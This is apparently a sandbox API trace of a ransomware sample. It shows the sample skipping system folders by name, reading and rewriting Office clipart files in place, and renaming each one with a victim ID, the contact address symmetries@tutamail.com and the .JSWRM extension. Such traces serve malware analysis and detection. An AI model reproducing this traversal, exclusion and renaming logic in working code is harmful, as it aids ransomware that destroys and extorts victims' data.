[0075.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLIP.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0075.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLIP.WMF", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLIP.WMF", lpUsedDefaultChar=0x0) returned 8 [0075.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0075.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLIP.WMF", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0075.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CLIP.WMF", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CLIP.WMF", lpUsedDefaultChar=0x0) returned 8 [0075.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.840] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2262) returned 1 [0075.840] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8d0) returned 0x23fc98 [0075.841] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0075.842] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.842] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0075.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.842] CloseHandle (hObject=0x460) returned 1 [0075.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0075.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0075.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0075.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0075.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.844] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b3a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CMNTY_01.MID", cAlternateFileName="")) returned 1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2=".") returned 1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="..") returned 1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="...") returned 1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="windows") returned -1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="recovery") returned -1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="perflogs") returned -1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="documents and settings") returned -1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="system volume information") returned -1 [0075.844] lstrcmpiW (lpString1="CMNTY_01.MID", lpString2="msocache") returned -1 [0075.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0075.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CMNTY_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CMNTY_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CMNTY_01.MID", lpUsedDefaultChar=0x0) returned 12 [0075.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0075.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CMNTY_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CMNTY_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CMNTY_01.MID", lpUsedDefaultChar=0x0) returned 12 [0075.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.845] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6970) returned 1 [0075.845] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b30) returned 0x24c1d0 [0075.845] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1b30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1b30, lpOverlapped=0x0) returned 1 [0075.847] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.847] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1b30, lpOverlapped=0x0) returned 1 [0075.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.847] CloseHandle (hObject=0x460) returned 1 [0075.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0075.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0075.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0075.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0075.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0075.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.847] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0075.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.848] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1496, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CRANE.WMF", cAlternateFileName="")) returned 1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2=".") returned 1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="..") returned 1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="...") returned 1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="windows") returned -1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="recovery") returned -1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="perflogs") returned -1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="documents and settings") returned -1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="system volume information") returned -1 [0075.848] lstrcmpiW (lpString1="CRANE.WMF", lpString2="msocache") returned -1 [0075.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANE.WMF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANE.WMF", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRANE.WMF", lpUsedDefaultChar=0x0) returned 9 [0075.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANE.WMF", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0075.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANE.WMF", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRANE.WMF", lpUsedDefaultChar=0x0) returned 9 [0075.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.849] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.849] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5270) returned 1 [0075.849] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1490) returned 0x24c1d0 [0075.849] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1490, lpOverlapped=0x0) returned 1 [0075.951] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.951] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1490, lpOverlapped=0x0) returned 1 [0075.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.952] CloseHandle (hObject=0x460) returned 1 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0075.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0075.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0075.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0075.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0075.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.952] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CRANE.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\crane.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0075.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.954] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc18a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="CRANINST.WMF", cAlternateFileName="")) returned 1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2=".") returned 1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="..") returned 1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="...") returned 1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="windows") returned -1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="recovery") returned -1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="perflogs") returned -1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="documents and settings") returned -1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="system volume information") returned -1 [0075.954] lstrcmpiW (lpString1="CRANINST.WMF", lpString2="msocache") returned -1 [0075.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0075.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANINST.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANINST.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRANINST.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0075.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0075.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANINST.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRANINST.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRANINST.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0075.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 